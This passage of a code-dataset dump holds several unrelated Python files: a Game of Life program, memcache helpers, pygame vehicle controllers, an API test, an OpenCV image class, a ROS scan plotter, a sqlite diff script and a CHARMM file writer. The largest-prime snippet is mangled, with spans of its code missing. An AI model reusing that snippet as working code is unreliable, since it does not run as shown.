exactly 3 live cells comes to life\"\n \"returns true if cell is born, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells == 3:\n return True\n else:\n return False\n \ndef create_matrix(rows, columns):\n 'creates a new matrix with desired columns and rows of zeroes'\n newmatrix = []\n value = 0\n for r in range(0, rows):\n newrow = []\n for c in range(0, columns):\n newrow.append(value)\n newmatrix.append(newrow) \n return newmatrix\n \ndef embedmatrix(matrix):\n \"embed imputed matrix into larger one that deals with edge cases\"\n r = len(matrix) + 2\n c = len(matrix[0]) + 2\n newmatrix = create_matrix(r,c)\n \n row = 0\n column = 0\n while row < len(matrix):\n while column < len(matrix[row]):\n newmatrix[row+1][column+1] = matrix[row][column]\n column = column + 1\n column = 0 \n row = row + 1\n return newmatrix\n\ndef is_on_edge(row, column, grid):\n \"checks if position in grid is on the edge\"\n \"argument is row #, column # of cell and the whole grid\"\n if row == 0 or column == 0:\n return True\n elif row == len(grid) - 1 or column == len(grid[0]) - 1:\n return True\n else:\n return False\n \ndef nextGen(grid):\n largergrid = embedmatrix(grid)\n ## Now loop through large grid checking if we change small grid values\n row = 0\n column = 0\n while row < len(largergrid):\n while column < len(largergrid[row]):\n if is_on_edge(row,column,largergrid) == True:\n pass\n else:\n if largergrid[row][column] == 1:\n if does_cell_live(row, column, largergrid) == False or does_cell_die(row, column, largergrid) == True:\n grid[row - 1][column - 1] = 0\n else:\n pass\n else:\n if is_cell_born(row, column, largergrid) == True:\n grid[row - 1][column - 1] = 1\n else:\n pass\n column = column + 1\n column = 0 \n row = row + 1\n \n return grid\n\ndef read_to_file(filename):\n \"reads to a file, converts into a matrix\"\n \"argument is desired filename\"\n grid = []\n row = []\n somefile = open(filename, \"r\")\n for line in somefile:\n for x in line.strip():\n row.append(int(x))\n grid.append(row)\n row = []\n somefile.close()\n return grid\n \ndef write_to_file(grid, filename):\n \"writes a matrix out to a file\"\n \"argument is matrix and desired file name\"\n outFile = open(filename, \"w\")\n for x in grid:\n for i in x:\n outFile.write(str(i))\n outFile.write(\"\\n\")\n outFile.close()\n\ndef print_grid(matrix):\n \"takes a matrix of 0's and 1's and prints it as . and *'s\"\n for x in matrix:\n for i in x:\n if i == 0:\n print(\". \",end='')\n else:\n print(\"* \",end='')\n print(\"\\n\")\n\ndef run_nextGen(numGens, matrix):\n most_recent = []\n print(\"Generation 0:\")\n print_grid(matrix)\n for x in range(0, numGens):\n most_recent = nextGen(matrix)\n print(\"Generation:\", x + 1)\n print_grid(most_recent)\n matrix = most_recent\n return most_recent\n \ndef life():\n while True:\n filename = input(\"Enter input file name: \")\n try:\n infile = open(filename, \"r\")\n break\n except:\n print(\"No such file. Try again\")\n while True:\n numGens = input(\"How many generations would you like to print? \")\n try:\n numGens = int(numGens)\n break \n except:\n print(\"Not a valid number.\")\n\n file_matrix = read_to_file(filename)\n most_recent = run_nextGen(numGens, file_matrix)\n yesorno = input(\"Would you like to save the latest generation? ('y' to save): \")\n if yesorno == 'y' :\n while True:\n destination = input(\"Enter destination file name: \")\n try:\n filedestination = open(destination, \"r\")\n question = input(\"Do you want to overwrite that file? ('y' to continue): \")\n if question == 'y':\n break\n else:\n pass\n except:\n break\n print(\"Saving data to\" , destination)\n write_to_file(most_recent, destination)\n print(\"End of program.\")\n\n\nlife() \n\n\n","sub_path":"python_samples/prog67.py","file_name":"prog67.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"154936937","text":"import logging\nimport datetime\nfrom google.appengine.api import memcache \nfrom models import employee as model_employee\nfrom models import skill as model_skill\n\n\"\"\"\n\t@description:\n\t\tSaves the current state of the Employee instance to memcache\n\"\"\" \ndef set_employee(uuid, employee):\n\tmemcache_key = 'employee:'+uuid\n\tmemcache.set(key=memcache_key, value=employee, namespace='razorfish')\n\treturn employee\n\n\"\"\"\n\t@description:\n\t\tGet the Employee from memcache\n\"\"\"\t \ndef get_employee(uuid): \n\temployee = None\n\tmemcache_key = 'employee:'+uuid\n\tmemcache_employee = memcache.get(key=memcache_key, namespace='razorfish')\n\tif memcache_employee is not None:\n\t\temployee = memcache_employee\n\t\tlogging.debug('get_employee() : Returning Employee from memcache')\n\telif uuid != '':\n\t\temployee = model_employee.Employee.get_by_key_name(uuid)\n\t\t# Save the Employee to memcache\n\t\tset_employee(uuid, employee) \n\t\tlogging.debug('get_employee() : Returning Employee from Datastore')\n\t\t\n\treturn employee\n\t\n\"\"\"\n\t@description:\n\t\tSaves the current Employee skills to memcache\n\"\"\" \ndef set_employee_skills(uuid, skills):\n\tmemcache_key = 'employee:'+uuid+':skills'\n\tmemcache.set(key=memcache_key, value=skills, namespace='razorfish')\n\treturn uuid\n\n\"\"\"\n\t@description:\n\t\tGet the current Skills for the Employee\n\"\"\" \ndef get_employee_skills(uuid):\n\tskills = None \n\temployee = None\n\t# TODO: Add get_employee() method to Memcache script\n\tmemcache_key = 'employee:'+uuid+':skills'\n\tmemcache_skills = memcache.get(key=memcache_key, namespace='razorfish')\n\tif memcache_skills is not None:\n\t\tskills = memcache_skills\n\t\tlogging.debug('get_employee_skills() : Returning Employee Skills from memcache')\n\telse:\n\t\temployee = get_employee(uuid)\n\t\tskills = model_skill.Skill.get(employee.skills)\n\t # Store the Employee Skills in memcache\n\t\tset_employee_skills(uuid, skills)\n\t\tlogging.debug('get_employee_skills() : Got Employee from Memcache. Returning Employee Skills from Datastore')\n\t\t\n\treturn skills\n\t\n\"\"\"\n\t@description:\n\t\tTemporarily stores errors against a new Employee create action\n\"\"\"\t\t\t \ndef set_employee_create_errors(uuid, errors):\n\tuuid = str(uuid)\n\tmemcache_key = 'employee:'+uuid+':errors'\n\tdone = memcache.set(key=memcache_key, value=errors, namespace='razorfish')\n\treturn done\n\t\n\t\n\"\"\"\n\t@description:\n\t\tGets Temporary errors against a new Employee create action\n\"\"\"\t\t\t \ndef get_employee_create_errors(uuid):\n\tmemcache_key = 'employee:'+uuid+':errors'\n\terrors = memcache.get(key=memcache_key, namespace='razorfish')\n\treturn errors\n\t\n\"\"\"\n\t@description:\n\t\tSaves all Skill instances from the Datastore to memcache\n\"\"\" \ndef set_all_skills():\n\tskills = model_skill.Skill.all()\n\tmemcache_key = 'skills'\n\tmemcache.set(key=memcache_key, value=skills, namespace='razorfish')\n\treturn skills\n\t\t\n\"\"\"\n\t@description:\n\t\tReturns all available Skill Model instances from memcache\n\"\"\"\t\ndef get_all_skills():\n\t# Attempt to get all Skills from Memcache \n\tskills = memcache.get(key='skills', namespace='razorfish')\n\t\n\tif skills is not None:\n\t\tlogging.debug('Returning Skills from Memcache')\n\t\treturn skills\n\t# Else Query them from the Datastore\n\telse:\n\t\tskills = set_all_skills()\n\t\treturn skills\n\n\"\"\"\n\t@description:\n\t\tSaves all instances of Employee to memcache\n\"\"\" \ndef set_all_employees():\n\temployees = model_employee.Employee.all()\n\tmemcache.set(key='employees', value=employees, namespace='razorfish')\n\treturn employees\n\t\n\"\"\"\n\t@description:\n\t\tReturns all available Employee Model instances\n\"\"\"\ndef get_all_employees():\n\t# Attempt to get all Employees from Memcache\n\temployees = memcache.get(key='employees', namespace='razorfish')\n\tif employees is not None:\n\t\tlogging.debug('Returning Employees from Memcache')\n\t\treturn employees\n\t# Else Query them from the Datastore\n\telse:\n\t\temployees = set_all_employees()\n\t\treturn employees\t\n\t\t\n\"\"\"\n\t@description:\n\t\tSets a Skills Search into memcache ONLY\n\"\"\"\ndef set_skills_searches(request):\n\trequest_args = dict()\n\tfor arg in request.arguments():\n\t\trequest_args[arg] = str(request.get(arg))\n\t\t\n\tskills_searches = get_skills_searches()\n\tif skills_searches is not None and len(skills_searches) > 0:\n\t\tskills_searches = skills_searches\n\telse:\n\t\tskills_searches = dict()\n\t\t\n\t# str(datetime.datetime.now().isoformat())\n\tskills_searches[datetime.datetime.now().isoformat()] = request_args\t\t\n\t\n\tmemcache.set(key='skills:searches', value=skills_searches, namespace='razorfish')\n\t\n\treturn True\n\t\n\"\"\"\n\t@description:\n\t\tGets all Skills Searches from memcache ONLY\n\"\"\"\ndef get_skills_searches():\n\tskills_searches = memcache.get(key='skills:searches', namespace='razorfish')\n\tlogging.debug(skills_searches)\n\treturn skills_searches","sub_path":"controllers/memcache.py","file_name":"memcache.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"451879903","text":"import random\n\nimport numpy as np\nimport pygame\n\nimport dagger\n\nactions = ['FWD', 'BACK', 'LEFT', 'RIGHT']\n\ndef normalize_angle(ang):\n if ang<0:\n ang = ang%(2*np.pi)\n ang = 2*np.pi + ang\n return ang%(2*np.pi)\n\ndef action_to_vecs(action):\n a1 = 0\n if 'FWD' in action:\n a1 = 1\n elif 'BACK' in action:\n a1 = 2\n a2 = 0\n if 'LEFT' in action:\n a2 = 1\n elif 'RIGHT' in action:\n a2 = 2\n return (a1, a2)\n\ndef vecs_to_action(vecs):\n a1 = vecs[0]\n a2 = vecs[1]\n action = []\n if a1 == 1:\n action.append('FWD')\n elif a1 == 2:\n action.append('BACK')\n if a2 == 1:\n action.append('LEFT')\n elif a2 == 2:\n action.append('RIGHT')\n return action\n\nclass VehicleController(object):\n \"\"\"\n Basic class for a vehicle controller - target\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = ['FWD']\n\n def next_action(self, state=None):\n \"\"\"\n Calculates the next action for the vehicle.\n state: (vehicle1_state, vehicle2_state)\n \"\"\"\n if not state:\n # random walk\n if random.random() > 0.99:\n action = [random.choice(actions)]\n else:\n action = self.prev_action\n self.prev_action = action\n return action\n\nclass UserController(VehicleController):\n \"\"\"\n Controller that has user input...\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n self.control_history = []\n self.state_history = []\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n if keys[pygame.K_UP]:\n control.append('FWD')\n if keys[pygame.K_LEFT]:\n control.append('LEFT')\n if keys[pygame.K_DOWN]:\n control.append('BACK')\n if keys[pygame.K_RIGHT]:\n control.append('RIGHT')\n self.state_history.append(state)\n self.control_history.append(control)\n return control\n\nclass BasicEvasionController(VehicleController):\n \"\"\"\n Always travels away from the pursuer.\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n\n def next_action(self, state=None):\n \"\"\"\n state: (self vehicle state, other vehicle state)\n \"\"\"\n control = []\n self_state = state[0]\n other_state = state[1]\n pos_diff = [self_state[0]-other_state[0], self_state[1]-other_state[1]]\n heading_diff = normalize_angle(self_state[2]) - normalize_angle(other_state[2])\n # note: normalize heading_diff to be between pi and -pi\n # print heading_diff\n if heading_diff < 0 and np.abs(heading_diff) < np.pi/2:\n control.append('LEFT')\n elif heading_diff > 0 and heading_diff < np.pi/2:\n control.append('RIGHT')\n control.append('FWD')\n return control\n\nclass DaggerPursuitController(VehicleController):\n \"\"\"\n Controller that has dummy user input...\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n # what's the difference between control and action history?\n # well, control history is always the user inputs if there is a user \n # input, while action history\n # is always the actions taken. Sometimes they are one and the same.\n self.control_history = []\n self.action_history = []\n self.state_history = []\n self.model = model\n # controls: 'policy_learn', 'user', 'policy'\n # 'policy' doesn't do any learning\n self.control = 'user'\n self.round = 0\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n if keys[pygame.K_UP]:\n control.append('FWD')\n if keys[pygame.K_LEFT]:\n control.append('LEFT')\n if keys[pygame.K_DOWN]:\n control.append('BACK')\n if keys[pygame.K_RIGHT]:\n control.append('RIGHT')\n state = np.concatenate((state[0], state[1]))\n if self.control=='policy_learn':\n self.state_history.append(state)\n action = vecs_to_action(self.model.action(state,\n action_to_vecs(self.prev_action)))\n self.prev_action = action\n # basically, if no key is pressed then we're implicitly agreeing\n # with the provided policy.\n if control or keys[pygame.K_SPACE]:\n self.control_history.append(action_to_vecs(control))\n else:\n self.control_history.append(action_to_vecs(action))\n self.action_history.append(action_to_vecs(action))\n return action\n elif self.control=='policy':\n action = vecs_to_action(self.model.action(state,\n action_to_vecs(self.prev_action)))\n self.prev_action = action\n return action\n else:\n if control:\n self.state_history.append(state)\n self.control_history.append(action_to_vecs(control))\n self.prev_action = control\n self.action_history.append(action_to_vecs(control))\n return control\n\n def train(self):\n \"\"\"\n Resets the round, trains using the new data\n \"\"\"\n self.model.train(self.state_history, self.control_history,\n self.action_history)\n self.control_history = []\n self.state_history = []\n self.action_history = []\n self.round += 1\n\n\nclass DaggerEvasionController(VehicleController):\n \"\"\"\n Controller that has dummy user input...\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n self.control_history = []\n self.state_history = []\n self.model = model\n self.control = 'policy'\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n if keys[pygame.K_W]:\n control.append('FWD')\n if keys[pygame.K_A]:\n control.append('LEFT')\n if keys[pygame.K_S]:\n control.append('BACK')\n if keys[pygame.K_D]:\n control.append('RIGHT')\n self.state_history.append(state)\n self.control_history.append(control)\n if self.control=='policy':\n action = self.model.action(state,\n action_to_vecs(self.prev_action))\n self.prev_action = action\n return action\n else:\n self.prev_action = control\n return control\n\nclass RLController(VehicleController):\n \"\"\"\n Reinforcement learning controller...\n Basically just a wrapper around a RL model\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.model = model\n self.state_history = []\n self.control_history = []\n self.reward_history = []\n\n def reward(self, state, k=100.0):\n \"\"\"\n Reward function for the pursuit model.\n\n Reward function is k/distance - 1.\n \"\"\"\n p1 = state[0:2]\n p2 = state[5:7]\n dist = np.sqrt(np.dot(p2-p1, p2-p1))\n return k/dist - 1.0\n\n def next_action(self, state=None):\n \"\"\"\n Just get the action from the model.\n \"\"\"\n current_reward = self.reward(state)\n self.reward_history.append(current_reward)\n action = self.model.action(state)\n self.state_history.append(state)\n self.control_history.append(action)\n return action\n\n def train(self):\n \"\"\"\n Train the Deep-Q learner\n \"\"\"\n self.model.train(self.state_history, self.control_history,\n self.reward_history)\n self.state_history = []\n self.control_history = []\n self.reward_history = []\n","sub_path":"vehicle_controller.py","file_name":"vehicle_controller.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"174164633","text":"import json\n\nimport requests\n\n\nmy_data = open(\"data.json\", \"r\").read()\n\nresp = requests.post(\"https://reqres.in/api/users\", data=json.loads(my_data))\n\n\nprint(resp)\n\nprint(resp.json())\n\nprint(resp.headers.get(\"Content-Type\"))\nassert resp.json()['job'] == 'Automation', 'Job role doesnt match'\n\n\n","sub_path":"api_test/create_user2.py","file_name":"create_user2.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"384391240","text":"#! usr/bin/python\n# -*- coding:utf-8 -*-\nimport cv2\n\nfrom .coordinate import Rect\nfrom .utils import read_image, bytes_2_img, auto_increment\nfrom .exceptions import NoImageDataError, WriteImageError, TransformError\nimport numpy as np\n\n\nclass _image(object):\n def __init__(self, img=None, flags=cv2.IMREAD_COLOR, path=''):\n \"\"\"\n 基础构造函数\n :param img: 图片数据\n :param flags: 写入图片的cv flags\n :param path: 默认的图片路径, 在读取和写入图片是起到作用\n :return: None\n \"\"\"\n self.tmp_path = path\n self.image_data = None\n if img is not None:\n self.imwrite(img, flags)\n\n def save2path(self, path=None):\n \"\"\"\n 写入图片到文件\n :param path: 写入的文件路径\n :return: None\n \"\"\"\n path = path or self.path\n cv2.imwrite(path, self.imread())\n\n def imwrite(self, img, flags: int = cv2.IMREAD_COLOR):\n \"\"\"\n 往缓存中写入图片数据\n :param img: 写入的图片数据,可以是图片路径/bytes/numpy.ndarray/cuda_GpuMat/IMAGE\n :param flags: 写入图片的cv flags\n :return: None\n \"\"\"\n if isinstance(img, str):\n self.image_data = read_image('{}{}'.format(self.tmp_path, img), flags)\n elif isinstance(img, bytes):\n self.image_data = bytes_2_img(img)\n elif isinstance(img, np.ndarray):\n self.image_data = img.copy()\n elif isinstance(img, cv2.cuda_GpuMat):\n self.image_data = img.clone()\n elif isinstance(img, _image):\n raise TypeError('Please use the clone function')\n else:\n raise WriteImageError('Unknown params, type:{}, img={} '.format(type(img), img))\n\n def imread(self) -> np.ndarray:\n \"\"\"\n 读取图片数据 (内部会自动转换为cpu格式)\n :return: 图片数据(type: numpy.ndarray)\n \"\"\"\n if self.image_data is not None:\n if self.type == 'cpu':\n return self.image_data\n else:\n self.transform_cpu()\n return self.image_data\n else:\n raise NoImageDataError('No Image Data in variable')\n\n def download(self) -> cv2.cuda_GpuMat:\n \"\"\"\n 读取图片数据 (内部会自动转换为gpu格式)\n :return: 图片数据(type: cuda_GpuMat)\n \"\"\"\n if self.image_data is not None:\n if self.type == 'gpu':\n return self.image_data\n else:\n self.transform_gpu()\n return self.image_data\n else:\n raise NoImageDataError('No Image Data in variable')\n\n def clean_image(self):\n \"\"\"\n 清除缓存\n :return: None\n \"\"\"\n self.image_data = None\n\n @property\n def shape(self) -> tuple:\n \"\"\"\n 获取图片的行、宽、通道数\n :return: 行、宽、通道数\n \"\"\"\n if self.type == 'cpu':\n return self.imread().shape\n else:\n return self.download().size()[::-1] + (self.download().channels(),)\n\n @property\n def size(self) -> tuple:\n \"\"\"\n 获取图片的行、宽\n :return: 行、宽\n \"\"\"\n if self.type == 'cpu':\n return self.imread().shape[:-1]\n else:\n return self.download().size()[::-1]\n\n def clone(self):\n \"\"\"\n 返回一份copy的IMAGE\n :return: IMAGE\n \"\"\"\n if self.type == 'cpu':\n return IMAGE(self.imread(), self.path)\n else:\n return IMAGE(self.download(), self.path)\n\n @property\n def path(self):\n \"\"\"\n 获取图片的默认存放路径\n :return: tmp_path\n \"\"\"\n return self.tmp_path\n\n def transform_gpu(self):\n \"\"\"\n 将图片数据转换为cuda_GpuMat\n :return: None\n \"\"\"\n img = self.image_data\n if isinstance(img, np.ndarray):\n img = cv2.cuda_GpuMat()\n img.upload(self.imread())\n self.imwrite(img)\n elif isinstance(img, cv2.cuda_GpuMat):\n pass\n else:\n raise TransformError('transform Error, img type={}'.format(type(img)))\n\n def transform_cpu(self):\n \"\"\"\n 将图片数据转换为numpy.ndarray\n :return: None\n \"\"\"\n img = self.image_data\n if isinstance(img, cv2.cuda_GpuMat):\n img = img.download()\n self.imwrite(img)\n elif isinstance(img, np.ndarray):\n pass\n else:\n raise TransformError('transform Error, img type={}'.format(type(img)))\n\n @property\n def type(self):\n \"\"\"\n 获取图片数据的类型\n :return: 'cpu'/'gpu'\n \"\"\"\n if isinstance(self.image_data, np.ndarray):\n return 'cpu'\n elif isinstance(self.image_data, cv2.cuda_GpuMat):\n return 'gpu'\n\n\nclass IMAGE(_image):\n SHOW_INDEX = auto_increment()\n\n def imshow(self, title: str = None):\n \"\"\"\n 以GUI显示图片\n :param title: cv窗口的名称, 不填写会自动分配\n :return: None\n \"\"\"\n title = str(title or self.SHOW_INDEX())\n cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)\n cv2.imshow(title, self.imread())\n\n def rotate(self, angle: int = 90, clockwise: bool = True):\n \"\"\"\n 旋转图片\n :param angle: 旋转角度, 默认为90\n :param clockwise: True-顺时针旋转, False-逆时针旋转\n :return: self\n \"\"\"\n img = self.imread()\n if clockwise:\n angle = 360 - angle\n rows, cols, _ = img.shape\n center = (cols / 2, rows / 2)\n mask = img.copy()\n mask[:, :] = 255\n M = cv2.getRotationMatrix2D(center, angle, 1)\n top_right = np.array((cols, 0)) - np.array(center)\n bottom_right = np.array((cols, rows)) - np.array(center)\n top_right_after_rot = M[0:2, 0:2].dot(top_right)\n bottom_right_after_rot = M[0:2, 0:2].dot(bottom_right)\n new_width = max(int(abs(bottom_right_after_rot[0] * 2) + 0.5), int(abs(top_right_after_rot[0] * 2) + 0.5))\n new_height = max(int(abs(top_right_after_rot[1] * 2) + 0.5), int(abs(bottom_right_after_rot[1] * 2) + 0.5))\n offset_x, offset_y = (new_width - cols) / 2, (new_height - rows) / 2\n M[0, 2] += offset_x\n M[1, 2] += offset_y\n self.imwrite(cv2.warpAffine(img, M, (new_width, new_height)))\n return self\n\n def crop_image(self, rect):\n \"\"\"\n 区域范围截图,并将截取的区域构建新的IMAGE\n :param rect: 需要截图的范围,可以是Rect/[x,y,width,height]/(x,y,width,height)\n :return: 截取的区域\n \"\"\"\n img = self.imread()\n height, width = self.size\n if isinstance(rect, (list, tuple)) and len(rect) == 4:\n rect = Rect(*rect)\n elif isinstance(rect, Rect):\n pass\n else:\n raise ValueError('unknown rect: type={}, rect={}'.format(type(rect), rect))\n if not Rect(0, 0, width, height).contains(rect):\n raise OverflowError('Rect不能超出屏幕 rect={}, tl={}, br={}'.format(rect, rect.tl, rect.br))\n # 获取在图像中的实际有效区域:\n x_min, y_min = int(rect.tl.x), int(rect.tl.y)\n x_max, y_max = int(rect.br.x), int(rect.br.y)\n return IMAGE(img[y_min:y_max, x_min:x_max])\n\n def binarization(self):\n \"\"\"\n 使用大津法将图片二值化,并返回新的IMAGE\n :return: new IMAGE\n \"\"\"\n gray_img = self.cvtColor(dst=cv2.COLOR_BGR2GRAY)\n if self.type == 'cpu':\n retval, dst = cv2.threshold(gray_img, 0, 255, cv2.THRESH_OTSU)\n return IMAGE(dst)\n else:\n # cuda.threshold 不支持大津法\n retval, dst = cv2.threshold(gray_img.download(), 0, 255, cv2.THRESH_OTSU)\n img = cv2.cuda_GpuMat()\n img.upload(dst)\n return IMAGE(img)\n\n def rectangle(self, rect: Rect):\n \"\"\"\n 在图像上画出矩形\n :param rect: 需要截图的范围,可以是Rect/[x,y,width,height]/(x,y,width,height)\n :return: None\n \"\"\"\n pt1 = rect.tl\n pt2 = rect.br\n cv2.rectangle(self.imread(), (pt1.x, pt1.y), (pt2.x, pt2.y), (0, 255, 0), 2)\n\n def resize(self, w, h):\n \"\"\"\n 调整图片大小\n :param w: 需要设定的宽\n :param h: 需要设定的厂\n :return: self\n \"\"\"\n if self.type == 'cpu':\n img = cv2.resize(self.imread(), (int(w), int(h)))\n else:\n img = cv2.cuda.resize(self.download(), (int(w), int(h)))\n self.imwrite(img)\n return self\n\n def cv2_to_base64(self):\n \"\"\"\n 将图片数据转换为base64格式\n :return: base64格式的图片数据\n \"\"\"\n data = cv2.imencode('.png', self.imread())\n return data\n\n def cvtColor(self, dst):\n \"\"\"\n 转换图片颜色空间\n :param dst: Destination image\n :return: cuda_GpuMat/numpy.ndarry\n \"\"\"\n if self.type == 'cpu':\n return cv2.cvtColor(self.imread(), dst)\n else:\n return cv2.cuda.cvtColor(self.download(), dst)\n\n def rgb_2_gray(self):\n return self.cvtColor(cv2.COLOR_BGR2GRAY)","sub_path":"baseImage/base_image.py","file_name":"base_image.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230287159","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\nimport copy \n\nimport matplotlib.pyplot as plt\nimport laser_geometry.laser_geometry as lg\nimport sensor_msgs.point_cloud2 as pc2\n\nfrom sensor_msgs.msg import PointCloud2\nfrom sensor_msgs.msg import LaserScan\n\nlp = lg.LaserProjection()\nscanner_readings_x = []\nscanner_readings_y = []\n\ndef scanCallBack(ros_data):\n global scanner_readings_x\n global scanner_readings_y\n scanner_readings_x = []\n scanner_readings_y = []\n\n pc2_msg = lp.projectLaser(ros_data)\n point_generator = pc2.read_points(pc2_msg)\n\n for point in point_generator:\n scanner_readings_x.append(point[0])\n scanner_readings_y.append(point[1])\n\n\n\n\nif __name__==\"__main__\":\n \n global scanner_readings_x\n global scanner_readings_y\n\n # Start the ros node\n rospy.init_node('scaner_vishulizer')\n\n # Subscribers and publishers\n subscriber = rospy.Subscriber('/scan', LaserScan, scanCallBack)\n \n # Setting the rate\n set_rate = 5\n rate = rospy.Rate(set_rate)\n\n while not rospy.is_shutdown():\n\n scan_x = copy.deepcopy(scanner_readings_x)\n scan_y = copy.deepcopy(scanner_readings_y)\n\n if (len(scan_x) == len(scan_y)):\n print(len(scan_x))\n print(len(scan_y))\n print(\"------------------------\")\n # Plot the trust\n plt.clf()\n plt.ylim((-4,4))\n plt.xlim((-4,4))\n plt.ylabel('Position Y')\n plt.xlabel('Position X')\n plt.scatter(scan_x,scan_y)\n plt.pause(0.000001)\n\n # Sleep\n rate.sleep()","sub_path":"ros_ws/src/robot_drive/src/laser_scan_vis.py","file_name":"laser_scan_vis.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"451974428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Diff entries from two sqlite3 db\nimport os\nimport sqlite3\nimport sys\n\ndef get_entries(db_name):\n db = sqlite3.connect(db_name)\n cur = db.cursor()\n cur.execute(\"SELECT name, type, path from searchIndex\")\n entries = cur.fetchall()\n db.commit()\n db.close()\n return set(entries)\n\ndef diff(old, new):\n add = new - old\n rem = old - new\n print(\"Added: %d\" % len(add))\n print_merged_entries(add)\n print(\"Removed: %d\" % len(rem))\n print_merged_entries(rem)\n\ndef print_merged_entries(entries):\n if len(entries) == 0:\n return\n entries = sorted(entries, key=lambda x: x[2])\n entries_in_previous_doc = []\n current_doc = entries[0][2].split('#')[0]\n start = 0\n for i in range(0, len(entries)):\n doc_name, _ = entries[i][2].split('#')\n if doc_name != current_doc:\n entries_in_previous_doc = entries[start:i]\n start = i\n print(\"%s: %d\" % (\n os.path.splitext(current_doc)[0], len(entries_in_previous_doc)))\n for e in entries_in_previous_doc:\n print('\\t%s' % e[0])\n print('')\n current_doc = doc_name\n entries_in_previous_doc = entries[start:]\n print(\"%s: %d\" % (\n os.path.splitext(current_doc)[0], len(entries_in_previous_doc)))\n for e in entries_in_previous_doc:\n print('\\t%s' % e[0])\n print('')\n\nif __name__ == '__main__':\n argc = len(sys.argv)\n if argc == 3:\n old = get_entries(sys.argv[1])\n new = get_entries(sys.argv[2])\n diff(old, new)\n elif argc == 2:\n entries = get_entries(sys.argv[1])\n diff(set(), entries)\n else:\n print(\"Diff entries with given sqlite3 db\")\n print(\"Usage: %s [old_sqlite.db] new_sqlite.db\")\n","sub_path":"dash/diff_entries.py","file_name":"diff_entries.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"436365081","text":"import math\r\ndef isPrime(n):\r\n flag=0\r\n i=2;\r\n while imax):\r\n max=i\r\n if(isPrime(n//i)):\r\n print(\"prime/\"+(str)(n//i))\r\n if(n//i>max):\r\n max=n//i\r\n \r\n i=i+1\r\nprint(max)\r\n\r\n\r\n\r\n \r\n\r\n \r\n","sub_path":"largestPrime.py","file_name":"largestPrime.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"31766518","text":"\"\"\"\nSCRIPT TO WRITE CHARMM RTF AND PRM FILES \nFROM BOSS ZMATRIX\nCreated on Mon Feb 15 15:40:05 2016\n@author: Leela S. Dodda leela.dodda@yale.edu\n@author: William L. Jorgensen Lab \n\nREQUIREMENTS:\nBOSS (need to set BOSSdir in bashrc and cshrc)\nPreferably Anaconda python with following modules\npandas \nargparse\nnumpy\n\"\"\"\n\nfrom LigParGen.BOSSReader import bossPdbAtom2Element,bossElement2Mass,ucomb\nimport pickle\nimport pandas as pd\nimport numpy as np\n\n\ndef retDihedImp(df):\n odihed = []\n if np.sum([df['V' + str(pot)] for pot in range(1, 5)]) != 0.0:\n for pot in range(1, 5):\n if (df['V' + str(pot)] != 0.0):\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n else:\n pot = 2\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n return (odihed)\n\n\ndef retDihed(df):\n odihed = []\n for pot in range(1, 5):\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n return (odihed)\n\n\ndef Boss2CharmmRTF(num2typ2symb, Qs, resid, bnd_df, imps):\n charges = [float(Qs[i][1]) for i in range(len(Qs))]\n rtf = open(resid + '.rtf', 'w+')\n rtf.write('! generated RTF file for NAMD/CHARMM \\n! Written by Leela S. Dodda (leela.dodda@yale.edu)\\n')\n Mass = ['MASS %d %s %3.4f %s \\n' % ((i + 1), num2typ2symb[i][2], bossElement2Mass(\n bossPdbAtom2Element(num2typ2symb[i][0])), bossPdbAtom2Element(num2typ2symb[i][0])) for i in range(len(Qs))]\n for i in range(len(Mass)):\n rtf.write('%s' % Mass[i])\n rtf.write('AUTO ANGLES DIHE \\n')\n rtf.write('RESI %5s %3.3f \\n' % (resid, sum(charges)))\n for i in range(len(Qs)):\n rtf.write('ATOM %s %s %s \\n' % (num2typ2symb[i][0], bossPdbAtom2Element(\n num2typ2symb[i][0]) + num2typ2symb[i][1][-3:], 